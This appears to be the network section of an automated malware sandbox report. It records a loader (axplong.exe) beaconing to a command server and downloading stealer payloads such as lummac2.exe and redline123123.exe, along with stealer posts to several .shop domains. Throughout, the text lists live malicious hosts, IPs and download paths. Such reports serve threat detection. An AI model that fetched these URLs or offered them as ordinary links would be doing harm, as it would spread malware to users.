Date: Tue, 18 Jun 2024 07:25:45 GMT
Content-Type: application/octet-stream
Content-Length: 11256832
Last-Modified: Tue, 04 Jun 2024 14:23:51 GMT
Connection: keep-alive
ETag: "665f2377-abc400"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/redline123123.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/redline123123.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:50 GMT
Content-Type: application/octet-stream
Content-Length: 304128
Last-Modified: Tue, 04 Jun 2024 14:24:04 GMT
Connection: keep-alive
ETag: "665f2384-4a400"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/upd.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/upd.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:51 GMT
Content-Type: application/octet-stream
Content-Length: 1834536
Last-Modified: Tue, 04 Jun 2024 14:24:10 GMT
Connection: keep-alive
ETag: "665f238a-1bfe28"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/setup222.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/setup222.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:53 GMT
Content-Type: application/octet-stream
Content-Length: 98816
Last-Modified: Sun, 09 Jun 2024 02:17:50 GMT
Connection: keep-alive
ETag: "666510ce-18200"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/gold.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/gold.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:55 GMT
Content-Type: application/octet-stream
Content-Length: 535080
Last-Modified: Sun, 09 Jun 2024 13:04:14 GMT
Connection: keep-alive
ETag: "6665a84e-82a28"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/lummac2.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/lummac2.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:56 GMT
Content-Type: application/octet-stream
Content-Length: 317952
Last-Modified: Mon, 10 Jun 2024 00:19:35 GMT
Connection: keep-alive
ETag: "66664697-4da00"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/drivermanager.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/drivermanager.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:57 GMT
Content-Type: application/octet-stream
Content-Length: 3760128
Last-Modified: Thu, 13 Jun 2024 18:52:38 GMT
Connection: keep-alive
ETag: "666b3ff6-396000"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/monster.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/monster.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:07 GMT
Content-Type: application/octet-stream
Content-Length: 11268608
Last-Modified: Sat, 15 Jun 2024 16:02:56 GMT
Connection: keep-alive
ETag: "666dbb30-abf200"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/legs.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/legs.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:20 GMT
Content-Type: application/octet-stream
Content-Length: 675368
Last-Modified: Mon, 17 Jun 2024 16:10:43 GMT
Connection: keep-alive
ETag: "66706003-a4e28"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

accounts.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.27.84
DNS

3.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.200.250.142.in-addr.arpa

IN PTR

Response

3.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f31e100net
DNS

10.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.200.250.142.in-addr.arpa

IN PTR

Response

10.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f101e100net
DNS

14.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.178.250.142.in-addr.arpa

IN PTR

Response

14.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f141e100net
DNS

84.27.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.27.250.142.in-addr.arpa

IN PTR

Response

84.27.250.142.in-addr.arpa

IN PTR

ra-in-f841e100net
DNS

content-autofill.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

142.250.200.42

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

172.217.169.42

content-autofill.googleapis.com

IN A

216.58.212.234

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

142.250.187.202

content-autofill.googleapis.com

IN A

216.58.212.202

content-autofill.googleapis.com

IN A

172.217.169.74

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

142.250.179.234

content-autofill.googleapis.com

IN A

142.250.178.10
DNS

accounts.youtube.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.187.238
GET

https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-532901074&timestamp=1718695545480

chrome.exe

Remote address:

142.250.187.238:443

Request

GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-532901074&timestamp=1718695545480 HTTP/2.0
host: accounts.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "110.0.5481.104"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CPj8ygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: iframe
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=O2lP1mGGSVE
cookie: VISITOR_INFO1_LIVE=-605Bvu1iUA
cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgNw%3D%3D
DNS

195.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.212.58.216.in-addr.arpa

IN PTR

Response

195.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f31e100net

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f195�H

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f3�H
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

99.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.201.58.216.in-addr.arpa

IN PTR

Response

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f31e100net

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f99�G

99.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f3�G
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.169.46
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

46.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

46.169.217.172.in-addr.arpa

IN PTR

Response

46.169.217.172.in-addr.arpa

IN PTR

lhr48s08-in-f141e100net
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.206
DNS

206.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.187.250.142.in-addr.arpa

IN PTR

Response

206.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f141e100net
DNS

boredombusters.online

setup222.exe

Remote address:

8.8.8.8:53

Request

boredombusters.online

IN A

Response

boredombusters.online

IN A

172.67.198.131

boredombusters.online

IN A

104.21.44.95
GET

https://boredombusters.online/setup.exe

setup222.exe

Remote address:

172.67.198.131:443

Request

GET /setup.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: boredombusters.online
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Date: Tue, 18 Jun 2024 07:25:56 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Location: /app/138/setup.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iP3TAtWUfEivjHHMFKwXwcA2pXpzWCvM4rb1m4eXim1lO5P4DjtFS5Sg5NHz%2B4d5rzXxqDz0rfWp6fPStXynTMuJFz%2F5mepQEZOLtJrZQ1UjCr%2FNP%2BgG1DE3D7SFa4DysTWQmb10KBc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c5c7cfb23be-LHR
alt-svc: h3=":443"; ma=86400
GET

https://boredombusters.online/app/138/setup.exe

setup222.exe

Remote address:

172.67.198.131:443

Request

GET /app/138/setup.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: boredombusters.online
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:25:56 GMT
Content-Type: application/octet-stream
Content-Length: 38009344
Connection: keep-alive
Last-Modified: Mon, 17 Jun 2024 22:01:10 GMT
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="setup.exe"
Cache-Control: no-store
CF-Cache-Status: HIT
Age: 24
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRkyOexyscEJzMp7QYKtcBOloYsW2peuE910IyFcIkaOlNlACjtI1nhUCVsQH6tX3aV3Jk%2BO1vVC%2BRLmcEykfHgJbIiD%2FQBjj3PMOOC%2BdMWFPqy2IgdR%2Bz9BSb%2FAf7l85yMl%2B1lKeJE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 89598c5deed923be-LHR
alt-svc: h3=":443"; ma=86400
GET

https://boredombusters.online/version2.txt

setup222.exe

Remote address:

172.67.198.131:443

Request

GET /version2.txt HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: boredombusters.online
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:05 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJIeA0oBv5USRx%2BQBQDebkRnKjOr9Ypit6fxCZsVkc1oHZ8zDb%2B%2Bi9GJHUcUmOuqmFGO%2FZkojDmUP6B13jHK1IMIH88wdU%2Bx2bxdk55h9yRNaf668U%2FdfZMTTbcPHA7Trktysjh2oIk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c92dba723be-LHR
alt-svc: h3=":443"; ma=86400
DNS

131.198.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.198.67.172.in-addr.arpa

IN PTR

Response
DNS

67.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.113.215.185.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

stub.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

33.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.128.172.185.in-addr.arpa

IN PTR

Response
GET

http://ip-api.com/json

stub.exe

Remote address:

208.95.112.1:80

Request

GET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.10 aiohttp/3.8.6

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:25:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 32
X-Rl: 42
DNS

raw.githubusercontent.com

stub.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133
DNS

11.97.55.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.97.55.23.in-addr.arpa

IN PTR

Response

11.97.55.23.in-addr.arpa

IN PTR

a23-55-97-11deploystaticakamaitechnologiescom
DNS

11.97.55.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.97.55.23.in-addr.arpa

IN PTR
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

237.27.185.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.27.185.4.in-addr.arpa

IN PTR

Response
DNS

133.108.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.108.199.185.in-addr.arpa

IN PTR

Response

133.108.199.185.in-addr.arpa

IN PTR

cdn-185-199-108-133githubcom
DNS

parallelmercywksoffw.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

parallelmercywksoffw.shop

IN A

Response

parallelmercywksoffw.shop

IN A

172.67.165.247

parallelmercywksoffw.shop

IN A

104.21.16.21
POST

https://parallelmercywksoffw.shop/api

lummac2.exe

Remote address:

172.67.165.247:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: parallelmercywksoffw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=8758teiqov5ghsl67c0b2t0slc; expires=Sat, 12-Oct-2024 01:12:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9tMScqpZ8LnIl3Gm%2F4zncpEceY2%2BnG52TQj3FHdT%2F9Dudt6fsbDdBEf5%2FbrXr4CnQqQHKQ1%2BAveV%2FI0XqPaAZtjusz%2FC0HRxWJswVXF9eARCuitXerpCNSDacUCo0pQREeF5udNVTgeYj2%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c764e2576cc-LHR
alt-svc: h3=":443"; ma=86400
POST

https://parallelmercywksoffw.shop/api

lummac2.exe

Remote address:

172.67.165.247:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: parallelmercywksoffw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=1eunshn639v5f4a3jrpnqa85r6; expires=Sat, 12-Oct-2024 01:12:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRRSv4uvIhPki8GMPgkgGgq1dkWctiSaqGHHhasgXjnUjZiJhrPqq06wNAXtzutS7QxU3IIF%2FT1BgqavRKCcm7wn5H5m4EEra98ajPveUJusDWYy1CJ%2BozwTa%2FRCmFCFGXbEM48KN1lMzQu4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c88dc3776cc-LHR
alt-svc: h3=":443"; ma=86400
DNS

liabiliytshareodlkv.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

liabiliytshareodlkv.shop

IN A

Response

liabiliytshareodlkv.shop

IN A

104.21.63.189

liabiliytshareodlkv.shop

IN A

172.67.171.178
POST

https://liabiliytshareodlkv.shop/api

lummac2.exe

Remote address:

104.21.63.189:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: liabiliytshareodlkv.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=8aot83f9amv5piobu7f0s466p9; expires=Sat, 12-Oct-2024 01:12:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VS6P%2FpBhq7rbuqPzkq12HVLIO8bwg7Jsekq4MxK0bKgIfIUtqP9xhSbqArQkV1p0j254TL8ZB5cGCMpm3bbzkLS9A8tNz%2Fd0ykm8jeyw7crifGdGHOqqLnDQ79WZj3EKUIwxIkANpbTsePs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c7a4dd49449-LHR
alt-svc: h3=":443"; ma=86400
DNS

247.165.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

247.165.67.172.in-addr.arpa

IN PTR

Response
DNS

notoriousdcellkw.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

notoriousdcellkw.shop

IN A

Response

notoriousdcellkw.shop

IN A

172.67.160.81

notoriousdcellkw.shop

IN A

104.21.74.169
POST

https://notoriousdcellkw.shop/api

lummac2.exe

Remote address:

172.67.160.81:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: notoriousdcellkw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lla4fl760ctlqmetlop1qhnn6v; expires=Sat, 12-Oct-2024 01:12:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7x7L2OZ3L8NhtVCBNo%2Ff80PHEIvaLYmepJ4CnsqZRLtAgPjNrZLYtX8PwPwmR%2FCa1OAw0zHfMtsXy1jBy8QjGQzUGI4N89%2F6Jk0fnJWkyWjkMQ9awY6VmQ9knLjic7k6yns22d%2BqrQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c7eb95b71f8-LHR
alt-svc: h3=":443"; ma=86400
DNS

189.63.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

189.63.21.104.in-addr.arpa

IN PTR

Response
DNS

81.160.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.160.67.172.in-addr.arpa

IN PTR

Response
DNS

conferencefreckewl.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

conferencefreckewl.shop

IN A

Response

conferencefreckewl.shop

IN A

104.21.59.152

conferencefreckewl.shop

IN A

172.67.179.192
POST

https://conferencefreckewl.shop/api

lummac2.exe

Remote address:

104.21.59.152:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: conferencefreckewl.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=r3iiona1r20v285s163vbu48c3; expires=Sat, 12-Oct-2024 01:12:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lf8fQQuQTcYLxHtb1k5ZO51erGfg5q2FJGqrCMgtEMwboQpTsRb1s3tM%2Fp%2BWrVfl1Vpa7YE6e1kGoYuCvhkhCbprekZFca9K8HcP6sfeuichvKUinIuo8JU2U%2FLYpyXTXXvJ79flP5LYcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
